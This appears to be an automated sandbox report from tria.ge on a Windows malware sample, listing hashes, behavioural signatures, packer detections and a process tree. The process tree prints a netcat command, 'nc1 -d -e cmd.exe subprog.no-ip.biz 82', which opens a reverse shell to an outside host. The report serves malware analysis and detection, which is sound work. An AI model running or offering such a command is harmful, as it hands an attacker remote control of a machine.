Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
141s -
max time network
102s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
20/07/2024, 08:45
Behavioral task
behavioral1
Sample
5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe
Resource
win7-20240708-en
General
-
Target
5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe
-
Size
1.3MB
-
MD5
5fce41613d2bb16e353e5546106568a0
-
SHA1
f8d76096e8cffe9ded2f1db2baf92e6a2d8edd02
-
SHA256
4443e16cbcd67066f1c66a9eba5ebf8091b371582a784b81c1fcf117b307473b
-
SHA512
ce18f167146c13a5a328b8caa5cc774eec6543f37054ff2da261dab4190766d45249aa0b3a5f35d9d0d0ac0002c89465cb93757aca94f17d40b59a11243a18a7
-
SSDEEP
24576:ttWcmES7iPyMHnz0iI85ZDuGX88PHKEHZyCyLyub8LlRHYt9N+KsTOrJZ:to797iKMHoi3PDXVPfHghyub8LL69NQ2
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation 5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe -
Executes dropped EXE 1 IoCs
pid Process 1188 nc1.exe -
resource yara_rule behavioral2/files/0x00070000000234c1-12.dat themida -
resource yara_rule behavioral2/memory/2724-0-0x0000000000400000-0x000000000057B000-memory.dmp upx behavioral2/memory/2724-16-0x0000000000400000-0x000000000057B000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2724 wrote to memory of 2212 2724 5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe 85 PID 2724 wrote to memory of 2212 2724 5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe 85 PID 2724 wrote to memory of 2212 2724 5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe 85 PID 2212 wrote to memory of 1188 2212 cmd.exe 88 PID 2212 wrote to memory of 1188 2212 cmd.exe 88 PID 2212 wrote to memory of 1188 2212 cmd.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8BF4.tmp\moi.bat" C:\Users\Admin\AppData\Local\Temp\"2⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Users\Admin\AppData\Local\Temp\8BF4.tmp\nc1.exenc1 -d -e cmd.exe subprog.no-ip.biz 823⤵
- Executes dropped EXE
PID:1188
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
55B
MD5b10865d09b79c801d0ed79c38e1148b2
SHA1927d484b37376dcb0a8223f89f06923664f75d3d
SHA2567478f318af4b1dcb082609f0019ae994b58b8fc0e7ac2c278d9547c71c7fabf8
SHA51289c21f6aec91738a60e9a849e0b0ceca330dab365b2c36e1c62a84b940bfd6921bb19381d5acfad18e169f4dd1ba0d2a85d5f0bdea1e3e721535c76e3c437768
-
Filesize
1.1MB
MD5a5923f2e7efaf747844e530baa7fe32a
SHA1285559a6bf798ce6e9a49a1db2795d89e12675a7
SHA2569dfaaa97fa17a13a490f3892bd4b3cb7c4424ab3607dcc00c3ab88987b7d7e30
SHA512fc8e9589cf0dc8b86f4a8f79619d0844cb2651342e049630fe6e6a22dbde65151c0571ac521e8823e5c5aeb3219c7b780f928b146bb6c2d673674235bdaf542e